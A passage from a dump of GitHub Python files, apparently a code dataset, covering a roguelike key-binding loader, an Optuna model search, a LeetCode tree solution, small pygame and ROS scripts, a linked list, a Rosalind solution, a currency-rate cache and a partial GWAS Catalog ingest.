Creating new file from defaults...\")\r\n _keyBindings_writeFromDefault()\r\n _init_keyBindings()\r\n\r\n#\r\n# *DO NOT CALL THIS FUNCTION*\r\n# call init_keyBindings instead\r\n# _init_keyBindings\r\n# read from a file and put key binding info into dict bind.\r\n#\r\ndef _init_keyBindings():\r\n \r\n global bind\r\n\r\n codes = [] # list of key codes 0-511 (0-255 and an additional 256\r\n # for special key inputs like NumPad digits)\r\n combin = [] # list of tuples (shift,ctrl,alt) for key combinations\r\n \r\n numCommands=0 #counter\r\n \r\n with open(file_keyBindings, 'r') as bindings:\r\n for line in bindings:\r\n if file_is_line_comment(line): continue #ignore comments\r\n\r\n #read this line as a command\r\n numCommands += 1\r\n \r\n #init\r\n line=word.remove_blankspace(line) #ignore white space\r\n line=line.lower() #not case-sensitive\r\n \r\n #NONE\r\n if \"none\" in line: #no key set, still need to put something in the list\r\n combin.append( (False,False,False,) )\r\n codes.append( -1 ) # NULL key\r\n continue\r\n \r\n # Key combinations #\r\n \r\n delete=0\r\n if 'shift+' in line:\r\n delete+=6\r\n _shf = True\r\n else: _shf = False\r\n if 'ctrl+' in line:\r\n delete+=5\r\n _ctl = True\r\n else: _ctl = False\r\n if 'alt+' in line:\r\n delete+=4\r\n _alt = True\r\n else: _alt = False\r\n combinData=(_shf,_ctl,_alt,)\r\n if delete: line=line[delete:]\r\n \r\n if line[1] == '\\n': # character keys\r\n codeData=key_getchar(ord(line[0]))\r\n else: # special keys\r\n new = TEXT_TO_KEY.get(line[:-1],-1)\r\n codeData=new\r\n \r\n combin.append( combinData )\r\n codes.append( codeData )\r\n #\r\n \r\n print(\"Key bindings loaded from '{}'\".format(file_keyBindings))\r\n \r\n n = NUM_ALT_CMDS\r\n # error checking\r\n if not ( numCommands == n*len(COMMANDS.keys()) ):\r\n print(\"number of commands: \", numCommands)\r\n print(\"number expected: \", n*len(COMMANDS.keys()))\r\n raise(Error_wrongNumberCommandsLoaded)\r\n # bind special combined key input to commands #\r\n try:\r\n for i,v in enumerate(COMMANDS.keys()):\r\n for j in range(n):\r\n index = i*n + j\r\n bind.update({ (codes[index], combin[index],) : v })\r\n except:\r\n raise(Error_wrongNumberCommandsLoaded)\r\n#end def _init_keyBindings\r\n\r\ndef _keyBindings_writeFromDefault():\r\n try:\r\n with open(file_keyBindings,\"w+\") as file:\r\n file.write(KEYBINDINGS_TEXT_DEFAULT)\r\n print(\"'key_bindings.txt' created.\")\r\n except:\r\n print(\"FATAL ERROR! 
Failed to create key_bindings.txt\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"eyeCube/Softly-Roguelike","sub_path":"src/orangio.py","file_name":"orangio.py","file_ext":"py","file_size_in_byte":29066,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"2430913855","text":"import os\nimport random\nimport time\n\nimport optuna\nimport pytorch_lightning as pl\nimport torch\nfrom pytorch_lightning import Callback, loggers, seed_everything\nfrom pytorch_lightning.callbacks import LearningRateMonitor\n\nfrom optuna_lightning_module import GenomeModule\nfrom optuna_utils import prepare_study\n\n\nclass MetricsCallback(Callback):\n \"\"\"PyTorch Lightning metric callback.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.metrics = []\n\n def on_validation_end(self, trainer, pl_module):\n self.metrics.append(trainer.callback_metrics)\n\n\ndef run_trials(\n ttargs,\n cluster=None,\n):\n # Try to avoid all trials trying to create the same study at once\n if ttargs.slurm == 1:\n time.sleep(random.randint(1, 30))\n\n study, h_search_frozen_trial = prepare_study(ttargs)\n\n study.optimize(lambda trial: objective(\n trial,\n hyperparser=ttargs,\n frozen_trial=h_search_frozen_trial,\n ),\n n_trials=ttargs.total_num_trials)\n\n\ndef objective(\n trial,\n hyperparser,\n frozen_trial,\n):\n\n # Seed the entire experiment with our set seed\n seed_everything(hyperparser.random_seed)\n\n if hyperparser.network == 1:\n folder = \"CNN/\"\n elif hyperparser.network == 2:\n folder = \"ResNet/\"\n elif hyperparser.network == 3:\n folder = \"Performer/\"\n elif hyperparser.network == 4:\n folder = \"Historical_Performer/\"\n elif hyperparser.network == 5:\n folder = \"Multimodal_Performer/\"\n\n # Filenames for each trial must be made unique in order to access each checkpoint.\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n os.path.join(hyperparser.model_dir, folder,\n \"trial_{}\".format(trial.number), \"{epoch}\"),\n monitor=\"val_loss\",\n save_top_k=1,\n )\n\n # The default logger in PyTorch Lightning writes to event files to be consumed by\n # TensorBoard. We don't use any logger here as it requires us to implement several abstract\n # methods. 
Instead we set up a simple callback that saves metrics from each validation step.\n metrics_callback = MetricsCallback()\n\n tb_logger = loggers.TensorBoardLogger(\n save_dir=os.path.join(hyperparser.logdir, \"tensorboard\", folder),\n log_graph=True,\n default_hp_metric=False,\n )\n if hyperparser.one_cycle == 1:\n print('one_cycle')\n lr_monitor = LearningRateMonitor(logging_interval='step')\n\n # Looks like we need one trainer for the tuner\n trainer = pl.Trainer(\n deterministic=True,\n limit_val_batches=0.0,\n auto_scale_batch_size=\"power\",\n gpus=1 if torch.cuda.is_available() else None,\n )\n model = GenomeModule(hyperparser, trial, hyperparser.datasets_dir,\n frozen_trial)\n new_batch_size = trainer.tune(model, trial_num=trial.number)\n model.hparams.batch_size = new_batch_size\n del (trainer)\n\n # And then initializing a new one for the lr-finder to work\n trainer = pl.Trainer(\n logger=tb_logger,\n deterministic=True,\n accumulate_grad_batches=1,\n checkpoint_callback=checkpoint_callback,\n limit_val_batches=1.0,\n # Allow pytorch-lightning to find the optimal batch size\n auto_scale_batch_size=\"power\",\n max_epochs=hyperparser.num_epochs,\n gpus=1 if torch.cuda.is_available() else None,\n callbacks=[\n lr_monitor,\n metrics_callback,\n ],\n )\n\n lr_finder = trainer.tuner.lr_find(model,\n trial_num=trial.number,\n min_lr=1e-8)\n suggested_lr = lr_finder.suggestion(skip_begin=30)\n hyperparser.lr = suggested_lr\n model.hparams.lr = suggested_lr\n\n else:\n print('regular')\n trainer = pl.Trainer(\n deterministic=True,\n accumulate_grad_batches=1,\n logger=tb_logger,\n checkpoint_callback=checkpoint_callback,\n limit_val_batches=1.0,\n # checkpoint_callback=checkpoint_callback,\n # Allow pytorch-lightning to find the optimal batch size\n auto_scale_batch_size=\"power\",\n max_epochs=hyperparser.num_epochs,\n gpus=1 if torch.cuda.is_available() else None,\n callbacks=[\n metrics_callback,\n ],\n )\n model = GenomeModule(hyperparser, trial, hyperparser.datasets_dir,\n frozen_trial)\n if hyperparser.find_batch_size:\n trainer.tune(model)\n\n if hyperparser.hyper_search:\n print(\"Searching hyperparameter space\")\n else:\n print(\n \"Using best model params from hyperparameter search and cross-validating\"\n )\n trainer.fit(model)\n\n if not hyperparser.hyper_search:\n # Pytorch lightning loads the best weights for us\n trainer.test(ckpt_path='best')\n\n return metrics_callback.metrics[-1][\"val_loss\"].item()\n","repo_name":"haakom/pay-attention-to-genomic-selection","sub_path":"src/optuna_search.py","file_name":"optuna_search.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"37282900858","text":"#\n# @lc app=leetcode id=1617 lang=python3\n#\n# [1617] Count Subtrees With Max Distance Between Cities\n#\n# https://leetcode.com/problems/count-subtrees-with-max-distance-between-cities/description/\n#\n# algorithms\n# Hard (62.98%)\n# Likes: 126\n# Dislikes: 20\n# Total Accepted: 3.6K\n# Total Submissions: 5.8K\n# Testcase Example: '4\\n[[1,2],[2,3],[2,4]]'\n#\n# There are n cities numbered from 1 to n. You are given an array edges of size\n# n-1, where edges[i] = [ui, vi] represents a bidirectional edge between cities\n# ui and vi. There exists a unique path between each pair of cities. 
In other\n# words, the cities form a tree.\n# \n# A subtree is a subset of cities where every city is reachable from every\n# other city in the subset, where the path between each pair passes through\n# only the cities from the subset. Two subtrees are different if there is a\n# city in one subtree that is not present in the other.\n# \n# For each d from 1 to n-1, find the number of subtrees in which the maximum\n# distance between any two cities in the subtree is equal to d.\n# \n# Return an array of size n-1 where the d^th element (1-indexed) is the number\n# of subtrees in which the maximum distance between any two cities is equal to\n# d.\n# \n# Notice that the distance between the two cities is the number of edges in the\n# path between them.\n# \n# \n# Example 1:\n# \n# \n# \n# \n# Input: n = 4, edges = [[1,2],[2,3],[2,4]]\n# Output: [3,4,0]\n# Explanation:\n# The subtrees with subsets {1,2}, {2,3} and {2,4} have a max distance of 1.\n# The subtrees with subsets {1,2,3}, {1,2,4}, {2,3,4} and {1,2,3,4} have a max\n# distance of 2.\n# No subtree has two nodes where the max distance between them is 3.\n# \n# \n# Example 2:\n# \n# \n# Input: n = 2, edges = [[1,2]]\n# Output: [1]\n# \n# \n# Example 3:\n# \n# \n# Input: n = 3, edges = [[1,2],[2,3]]\n# Output: [2,1]\n# \n# \n# \n# Constraints:\n# \n# \n# 2 <= n <= 15\n# edges.length == n-1\n# edges[i].length == 2\n# 1 <= ui, vi <= n\n# All pairs (ui, vi) are distinct.\n# \n#\n\n# @lc code=start\nfrom collections import defaultdict, deque\nimport itertools\n\nclass Solution:\n def countSubgraphsForEachDiameter(self, n: int, edges: List[List[int]]) -> List[int]:\n # Using Floyd-Warshall algorithm to calculate minimum distance between any node to any other node.\n # Since n <= 15, there is a maximum 2^15 subset of cities numbered from 1 to n.\n # Time complexity: O(2^n x n^2)\n # Space complexity: O(n^2)\n # def maxDistance(state): # return: maximum distance between any two cities in our subset. O(n^2)\n # cntEdge, cntCity, maxDist = 0, 0, 0\n # for i in range(n):\n # if state >> i & 1 == 0:\n # continue # Skip if city `i` not in our subset\n # cntCity += 1\n # for j in range(i + 1, n):\n # if state >> j & 1 == 0:\n # continue # Skip if city `j` not in our subset\n # cntEdge += dist[i][j] == 1\n # maxDist = max(maxDist, dist[i][j])\n # if cntEdge != cntCity - 1:\n # return 0 # Subset form an invalid subtree!\n # return maxDist\n\n # INF = n # Since cities form a tree so maximum distance between 2 cities always < n\n # dist = [[INF] * n for _ in range(n)]\n # for u, v in edges:\n # dist[u - 1][v - 1] = dist[v - 1][u - 1] = 1\n\n # for k in range(n):\n # for i in range(n):\n # for j in range(n):\n # dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j])\n\n # ans = [0] * (n - 1)\n # for state in range(1, 1 << n):\n # d = maxDistance(state)\n # if d > 0:\n # ans[d - 1] += 1\n # return ans\n\n\n # Bitmask + BFS every cities\n # Time complexity: O(2^n x n^2)\n # Space complexity: O(n^2)\n def bfs(src, cities):\n visited = {src}\n q = deque([(src, 0)]) # Pair of (vertex, distance)\n farthestDist = 0 # Farthest distance from src to other nodes\n while len(q) > 0:\n u, d = q.popleft()\n farthestDist = d\n for v in graph[u]:\n if v not in visited and v in cities:\n visited.add(v)\n q.append((v, d + 1))\n return farthestDist, visited\n\n def maxDistance(state): # return: maximum distance between any two cities in our subset. 
O(n^2)\n cities = set()\n for i in range(n):\n if state >> i & 1 == 1:\n cities.add(i)\n\n ans = 0\n for i in cities:\n farthestDist, visited = bfs(i, cities)\n if len(visited) < len(cities):\n return 0 # Can't visit all nodes of the tree -> Invalid tree\n ans = max(ans, farthestDist)\n return ans\n\n graph = defaultdict(list)\n for u, v in edges:\n graph[u - 1].append(v - 1)\n graph[v - 1].append(u - 1)\n\n ans = [0] * (n - 1)\n for state in range(1, 1 << n):\n d = maxDistance(state)\n if d > 0:\n ans[d - 1] += 1\n return ans\n\n\n\n # Bitmask + Diamter of the tree (BFS 2 times)\n # Time complexity: O(2^n x n)\n # Space complexity: O(n^2)\n # def bfs(src, cities):\n # visited = {src}\n # q = deque([(src, 0)]) # Pair of (vertex, distance)\n # farthestNode, farthestDist = -1, 0\n # while len(q) > 0:\n # farthestNode, farthestDist = u, d = q.popleft()\n # for v in graph[u]:\n # if v not in visited and v in cities:\n # visited.add(v)\n # q.append((v, d + 1))\n # return farthestNode, farthestDist, visited\n\n # def diameterOfTree(cities):\n # anyNode = cities.pop()\n # cities.add(anyNode)\n # farthestNode, _, visited = bfs(anyNode, cities)\n # if len(visited) < len(cities):\n # return 0 # Can't visit all nodes of the tree -> Invalid tree\n # _, dist, _ = bfs(farthestNode, cities)\n # return dist\n\n # def maxDistance(state): # return: maximum distance between any two cities in our subset. O(n)\n # cities = set()\n # for i in range(n):\n # if state >> i & 1 == 1:\n # cities.add(i)\n # return diameterOfTree(cities)\n \n # graph = defaultdict(list)\n # for u, v in edges:\n # graph[u - 1].append(v - 1)\n # graph[v - 1].append(u - 1)\n\n # ans = [0] * (n - 1)\n # for state in range(1, 1 << n):\n # d = maxDistance(state)\n # if d > 0:\n # ans[d - 1] += 1\n # return ans\n\n\n # Use Floyd-Warshall Algorithm to find all shortest paths.\n # Brute force all possible subsets and count subtrees with diameter d.\n # Time complexity: O(2^n x n^2)\n # Space complexity: O(n^2)\n # dist = [[float(\"inf\")] * n for _ in range(n)]\n # for u, v in edges:\n # dist[u - 1][v - 1] = dist[v - 1][u - 1] = 1\n\n # for k, i, j in itertools.permutations(range(n), 3):\n # dist[i][j] = min(dist[i][j], dist[i][k] + dist[k][j])\n\n # ans = [0] * (n - 1)\n # for k in range(2, n + 1):\n # for s in itertools.combinations(range(n), k):\n # e = sum(dist[i][j] for i, j in itertools.combinations(s, 2) if dist[i][j] == 1) \n # d = max(dist[i][j] for i, j in itertools.combinations(s, 2))\n # if e == k - 1:\n # ans[d - 1] += 1\n\n # return ans\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"1617.count-subtrees-with-max-distance-between-cities.py","file_name":"1617.count-subtrees-with-max-distance-between-cities.py","file_ext":"py","file_size_in_byte":7818,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20537484261","text":"import random\r\nimport pygame\r\npygame.init()\r\n\r\nwidth = 600\r\nheight = 600\r\nwindow = pygame.display.set_mode([width,height])\r\n\r\n\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\nwindow.fill(white)\r\n\r\nsize = 15\r\n\r\ndef distance(x,y,c,u):\r\n dis = (((c - x) ** 2) + ((u - y) ** 2)) ** 0.5\r\n return(dis)\r\ni = 0\r\nl = 0\r\ncircles = [random.randint(size,width - size),random.randint(size,height - size)]\r\npygame.draw.circle(window,black,(circles[i],circles[i + 1]),size)\r\npygame.display.flip()\r\nplaying = True\r\non = False\r\ncolor_change = False\r\ncolor = \"\"\r\nrun = 0\r\ncolor = black\r\ncolor_width = 
30\r\ncolor_height = 30\r\ntrack = 0\r\nr = pygame.Rect(0,0,color_width,color_height)\r\ncolors = []\r\nfor v in range(int(width / color_width)):\r\n colors.append((random.randint(0,255),random.randint(0,255),random.randint(0,255)))\r\n \r\nwhile playing:\r\n\r\n\r\n x, y = pygame.mouse.get_pos()\r\n\r\n for event in pygame.event.get():\r\n check = True\r\n if event.type == pygame.QUIT:\r\n playing = False\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n\r\n for z in range(int(len(circles) / 2)):\r\n x,y = pygame.mouse.get_pos()\r\n dist = distance(x,y,circles[l],circles[l + 1])\r\n if dist <= size:\r\n on = True\r\n l += 2\r\n l = 0\r\n if on:\r\n \r\n circles.append(random.randint(size, width - size))\r\n circles.append(random.randint(size, height - size))\r\n i += 2\r\n \r\n \r\n pygame.draw.circle(window,color,(circles[i],circles[i + 1]),size)\r\n on = False\r\n for p in range(len(colors)):\r\n if y <= color_height:\r\n if x > track and x < track + color_width:\r\n color = colors[p]\r\n track += color_width\r\n track = 0\r\n \r\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n window.fill(white)\r\n color = (random.randint(0,255),random.randint(0,255),random.randint(0,255))\r\n for q in range(int(len(circles)) // 2):\r\n pygame.draw.circle(window,color,(circles[run],circles[run + 1]),size)\r\n run += 2\r\n run = 0\r\n for a in range(len(colors)):\r\n pygame.draw.rect(window,colors[a],r)\r\n r.x += color_width\r\n r.x = 0\r\n pygame.display.flip() \r\n","repo_name":"NedmacuoT/Code-Projects","sub_path":"Click Circles.py","file_name":"Click Circles.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74781645925","text":"# pylint: disable-msg=W0622\n\"\"\"cubicweb-company application packaging information\"\"\"\n\nmodname = 'company'\ndistname = 'cubicweb-%s' % modname\n\nnumversion = (0, 8, 0)\nversion = '.'.join(str(num) for num in numversion)\n\nlicense = 'LGPL'\ndescription = 'company component for the CubicWeb framework'\n\nauthor = 'Logilab'\nauthor_email = 'contact@logilab.fr'\nweb = 'http://www.cubicweb.org/project/%s' % distname\nclassifiers = [\n 'Environment :: Web Environment',\n 'Framework :: CubicWeb',\n 'Programming Language :: Python',\n 'Programming Language :: JavaScript',\n ]\n\n__depends__ = {'cubicweb': '>= 3.24.0',\n 'cubicweb-addressbook': None}\n","repo_name":"gurneyalex/cubicweb-company","sub_path":"cubicweb_company/__pkginfo__.py","file_name":"__pkginfo__.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73976332965","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom math import sqrt\nfrom geometry_msgs.msg import Twist\nimport sys\n\ndef draw_triangle(l, speed):\n\trospy.init_node('draw_triangle', anonymous=True)\n\tpub = rospy.Publisher('/turtle1/cmd_vel', Twist, queue_size=10)\n\trate = rospy.Rate(10)\n\t\n\tvel = Twist()\n\n\twent = 0\n\tflag = 0\n\t\n\twhile flag < 3: #a separate rule for each direction\n\t\tsensivity = 36\n\t\tpiece = float(l/sensivity)\n\t\tvel.linear.x = 0\n\t\tvel.linear.y = 0\n\t\tvel.linear.z = 0\n\n\t\tvel.angular.x = 0\n\t\tvel.angular.y = 0\n\t\tvel.angular.z = 0\n\t\tdrw = sqrt(3)\n\t\tif flag == 0: #moves right, along the x axis only\n\t\t\tvel.linear.x = piece\n\t\t\t\n\t\telif flag == 1: #move towards the upper left\n\t\t\t\n\t\t\tvel.linear.x = -piece/2 \n\t\t\tvel.linear.y = 
drw*piece/2\n\t\t\t\n\t\telif flag == 2: #ucgeni bitirme\n\t\t\tvel.linear.x = -piece/2\n\t\t\tvel.linear.y = -piece*drw/2\n\t\t\n\t\tfor _ in range(sensivity):\n\t\t\tpub.publish(vel)\n\t\t\trate.sleep()\n\t\t\t\n\t\tflag += 1\n\t\t\nif __name__ == '__main__':\n\n\tspeed = 1\n\twhile 1:\n\t\tprint(\"q => exit\\nEnter side value : \", end=\"\")\n\t\tlenn = input()\n\t\tif lenn=='q':\n\t\t\tbreak\n\t\tlenn = int(lenn)\n\t\tdraw_triangle(lenn, speed)\n","repo_name":"afrat1/challenge1","sub_path":"turtlemove.py","file_name":"turtlemove.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40362657828","text":"class LinkedList:\n\n def __init__(self):\n self.head = self.tail = None\n self.length = 0\n\n def __repr__(self):\n res = []\n cur = self.head\n while cur:\n res.append(str(cur.val))\n cur = cur.next\n return \"->\".join(res)\n\n def __len__(self):\n return self.length\n\n def _get(self, index):\n cur = self.head\n while cur and index > 0:\n index -= 1\n cur = cur.next\n return cur, index\n\n\n def get(self, index):\n \"\"\"\n Get the value of the index-th node in the linked list. \n If the index is invalid, return -1.\n :type index: int\n :rtype: int\n \"\"\"\n cur, index = self._get(index)\n return cur.val if cur and index == 0 else -1\n\n\n def add_head(self, val):\n self.add_index(0, val)\n\n\n def add_tail(self, val):\n \"\"\"\n Append a node of value val to the last element of the linked list.\n :type val: int\n :rtype: void\n \"\"\"\n self.add_index(len(self), val)\n\n\n def add_index(self, index, val):\n \"\"\"\n Add a node of value val before the index-th node in the linked list. \n If index equals to the length of linked list, the node will be appended \n to the end of linked list. 
If index is greater than the length, \n the node will not be inserted.\n :type index: int\n :type val: int\n :rtype: void\n \"\"\"\n new = Node(val)\n if index == 0:\n new.next = self.head\n try:\n self.head.prev = new\n except AttributeError:\n self.tail = new\n self.head = new\n elif index == len(self):\n new.prev = self.tail\n try:\n self.tail.next = new\n except AttributeError:\n self.head = new\n self.tail = new\n elif 0 < index < len(self):\n cur, index = self._get(index)\n prev = cur.prev\n cur.prev = new\n prev.next = new\n new.next = cur\n new.prev = prev\n else:\n return\n self.length += 1\n\n\n def delete_index(self, index):\n \"\"\"\n Delete the index-th node in the linked list, if the index is valid.\n :type index: int\n :rtype: void\n \"\"\"\n node, index = self._get(index)\n if not node: return\n try:\n node.prev.next = node.next\n except AttributeError:\n self.head = node.next\n\n try:\n node.next.prev = node.prev\n except AttributeError:\n self.tail = node.prev\n self.length -= 1\n\n\nclass Node:\n def __init__(self, val):\n self.val = val\n self.next = self.prev = None\n\n def __repr__(self):\n return str(self.val)\n","repo_name":"steventhan/algo-review","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1930068129","text":"#finding a shared spliced motif\r\n#from Bio import SeqIO\r\ndef fasta(s):\r\n results={}\r\n string=s.strip().split('>')\r\n for s in string:\r\n if len(s)==0:\r\n continue\r\n part = s.split()\r\n label = part[0]\r\n bases = ''.join(part[1:])\r\n results[label] = bases\r\n return results\r\nlarge_dataset = open('dataset/rosalind_lcsq.txt').read()\r\nlarge_dataset=fasta(large_dataset)\r\n\r\ntemp=[]\r\nfor k,v in large_dataset.items():\r\n temp.append(v)\r\ns,t=temp[0],temp[1] \r\n\r\nlengths = [[0 for j in range(len(t) + 1)] for i in range(len(s) + 1)]\r\n#creates array of len(s) containing arrays of len(t) filled with 0\r\nfor i, x in enumerate(s):\r\n for j, y in enumerate(t):\r\n if x == y:\r\n lengths[i + 1][j + 1] = lengths[i][j] + 1\r\n else:\r\n lengths[i + 1][j + 1] = max(lengths[i + 1][j], lengths[i][j + 1])\r\n\r\nspliced_motif = ''\r\nx, y = len(s), len(t)\r\nwhile x * y != 0:\r\n if lengths[x][y] == lengths[x - 1][y]:\r\n x -= 1\r\n elif lengths[x][y] == lengths[x][y - 1]:\r\n y -= 1\r\n else:\r\n spliced_motif = s[x - 1] + spliced_motif\r\n x -= 1\r\n y -= 1\r\nprint(spliced_motif)","repo_name":"QQianway/Rosalind","sub_path":"Finding a Shared Spliced Motif.py","file_name":"Finding a Shared Spliced Motif.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72244821925","text":"import aioredis\nimport httpx\nfrom fastapi_utils.tasks import repeat_every\nfrom .settings import settings\n\nAPI_URL = settings.EXCHANGE_RATE_API_URL\nREDIS_URL = f\"redis://{settings.redis_host}\"\n\n\nasync def get_rates_by_date(date: str):\n async with httpx.AsyncClient() as client:\n url = f\"{API_URL}/{date}?base=USD\"\n response = await client.get(url)\n data = response.json()\n return data['rates']\n\n\nasync def get_latest_currencies():\n async with httpx.AsyncClient() as client:\n url = f\"{API_URL}/symbols\"\n response = await client.get(url)\n data = response.json()\n return data['symbols']\n\n\n# update the supported currencies cache every 48 hours\n@repeat_every(seconds=60 * 60 * 48)\nasync def 
update_currencies_cache():\n currencies = await get_latest_currencies()\n values = {v['code']: v['description'] for v in currencies.values()}\n redis = aioredis.from_url(REDIS_URL)\n await redis.hmset(\"currencies\", values)\n","repo_name":"damildrizzy/currency_converter","sub_path":"app/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17018030655","text":"import logging\nimport csv\nimport re\n\nfrom dipper.sources.Source import Source\nfrom dipper import config\nfrom dipper.utils.DipperUtil import DipperUtil\nfrom dipper.models.Model import Model\nfrom dipper.models.Genotype import Genotype\nfrom dipper.models.assoc.G2PAssoc import G2PAssoc\nfrom dipper.models.Reference import Reference\nfrom dipper.models.GenomicFeature import Feature, makeChromID\nfrom dipper.graph.RDFGraph import RDFGraph\n\nlogger = logging.getLogger(__name__)\n\n\nclass GWASCatalog(Source):\n \"\"\"\n The NHGRI-EBI Catalog of published genome-wide association studies.\n\n We link the variants recorded here to the curated EFO-classes using a\n \"contributes to\" linkage because the only thing we know is that the SNPs\n are associated with the trait/disease,\n but we don't know if it is actually causative.\n\n Description of the GWAS catalog is here:\n http://www.ebi.ac.uk/gwas/docs/fileheaders#_file_headers_for_catalog_version_1_0_1\n\n GWAS also pulishes Owl files described here\n http://www.ebi.ac.uk/gwas/docs/ontology\n\n\n Status: IN PROGRESS\n\n \"\"\"\n\n GWASFTP = 'ftp://ftp.ebi.ac.uk/pub/databases/gwas/releases/latest/'\n GWASFILE = 'gwas-catalog-associations_ontology-annotated.tsv'\n files = {\n 'catalog': {\n 'file': GWASFILE,\n 'url': GWASFTP + GWASFILE},\n 'efo': {\n 'file': 'efo.owl',\n 'url': 'http://www.ebi.ac.uk/efo/efo.owl'},\n 'so': {\n 'file': 'so.owl',\n 'url': 'http://purl.obolibrary.org/obo/so.owl'}\n }\n\n def __init__(self, graph_type, are_bnodes_skolemized):\n super().__init__(\n graph_type,\n are_bnodes_skolemized,\n 'gwascatalog',\n ingest_title='The NHGRI-EBI Catalog of published genome-wide association studies',\n ingest_url='http://www.ebi.ac.uk/gwas/',\n license_url='http://www.ebi.ac.uk/gwas/docs/about',\n data_rights='http://www.ebi.ac.uk/gwas/docs/about'\n # file_handle=None\n )\n\n if graph_type != 'rdf_graph':\n raise ValueError(\"GWAS Catalog requires a rdf_graph\")\n\n if 'test_ids' not in config.get_config() or 'gene' \\\n not in config.get_config()['test_ids']:\n logger.warning(\"not configured with gene test ids.\")\n else:\n self.test_ids = config.get_config()['test_ids']\n\n # build a dictionary of genomic location to identifiers,\n # to try to get the equivalences\n self.id_location_map = dict()\n\n return\n\n def fetch(self, is_dl_forced=False):\n \"\"\"\n\n :param is_dl_forced:\n :return:\n \"\"\"\n self.get_files(is_dl_forced)\n return\n\n def parse(self, limit=None):\n if limit is not None:\n logger.info(\"Only parsing first %s rows of each file\", limit)\n\n logger.info(\"Parsing files...\")\n\n if self.testOnly:\n self.testMode = True\n\n self.process_catalog(limit)\n\n logger.info(\"Finished parsing.\")\n return\n\n def process_catalog(self, limit=None):\n \"\"\"\n :param limit:\n :return:\n\n \"\"\"\n raw = '/'.join((self.rawdir, self.files['catalog']['file']))\n logger.info(\"Processing Data from %s\", raw)\n efo_ontology = RDFGraph(False, \"EFO\")\n logger.info(\"Loading EFO ontology in separate rdf graph\")\n 
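# Added sketch (assumption, not part of the original sources): a minimal,
# runnable version of the tab-separated ingest pattern that process_catalog()
# uses below — csv.reader with a tab delimiter, the header row taken with
# next(), and a per-row column-count check. The field names here are
# illustrative, not the real GWAS catalog header.
import csv, io

tsv = "SNPS\tCHR_ID\tP-VALUE\nrs7079041\t10\t2E-6\n"
reader = csv.reader(io.StringIO(tsv), delimiter="\t")
header = next(reader, None)
for row in reader:
    if len(header) != len(row):
        continue  # skip malformed rows (the real code logs them instead)
    record = dict(zip(header, row))
print(record)  # {'SNPS': 'rs7079041', 'CHR_ID': '10', 'P-VALUE': '2E-6'}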
efo_ontology.parse(self.files['efo']['url'], format='xml')\n efo_ontology.bind_all_namespaces()\n logger.info(\"Finished loading EFO ontology\")\n\n so_ontology = RDFGraph(False, \"SO\")\n logger.info(\"Loading SO ontology in separate rdf graph\")\n so_ontology.parse(self.files['so']['url'], format='xml')\n so_ontology.bind_all_namespaces()\n logger.info(\"Finished loading SO ontology\")\n\n line_counter = 0\n\n with open(raw, 'r', encoding=\"iso-8859-1\") as csvfile:\n filereader = csv.reader(csvfile, delimiter='\\t')\n header = next(filereader, None) # the header row\n header_len = len(header)\n logger.info('header length:\\t %i', header_len)\n\n for row in filereader:\n if not row:\n pass\n else:\n line_counter += 1\n if header_len != len(row):\n logger.error(\n 'BadRow: %i has %i columns', line_counter, row)\n pass\n\n (date_added_to_catalog,\n pubmed_num,\n first_author,\n pub_date,\n journal,\n link,\n study_name,\n disease_or_trait,\n initial_sample_description,\n replicate_sample_description,\n region,\n chrom_num,\n chrom_pos,\n reported_gene_nums,\n mapped_gene,\n upstream_gene_num,\n downstream_gene_num,\n snp_gene_nums,\n upstream_gene_distance,\n downstream_gene_distance,\n strongest_snp_risk_allele,\n snps,\n merged,\n snp_id_current,\n context,\n intergenic_flag,\n risk_allele_frequency,\n pvalue,\n pvalue_mlog,\n pvalue_text,\n or_or_beta,\n confidence_interval_95,\n platform_with_snps_passing_qc,\n cnv_flag,\n mapped_trait,\n mapped_trait_uri,\n study_accession,\n GENOTYPING_TECHNOLOGY\n ) = row\n\n if self.testMode:\n continue\n\n# 06-May-2015\t25917933\n# Zai CC\t20-Nov-2014\tJ Psychiatr Res\thttp://europepmc.org/abstract/MED/25917933\n# A genome-wide association study of suicide severity scores in bipolar disorder.\n# Suicide in bipolar disorder\n# 959 European ancestry individuals\tNA\n# 10p11.22\t10\t32704340\tC10orf68, CCDC7, ITGB1\tCCDC7\n# rs7079041-A\trs7079041\t0\t7079041\tintron\t0\t\t2E-6\t5.698970\n\n variant_curie, variant_type = self._get_curie_and_type_from_id(\n strongest_snp_risk_allele)\n\n if strongest_snp_risk_allele.strip() == '':\n logger.debug(\n \"No strongest SNP risk allele for %s:\\n%s\",\n pubmed_num, str(row))\n # still consider adding in the EFO terms\n # for what the study measured?\n continue\n\n if variant_type == 'snp':\n self._add_snp_to_graph(\n variant_curie, strongest_snp_risk_allele, chrom_num,\n chrom_pos, context, 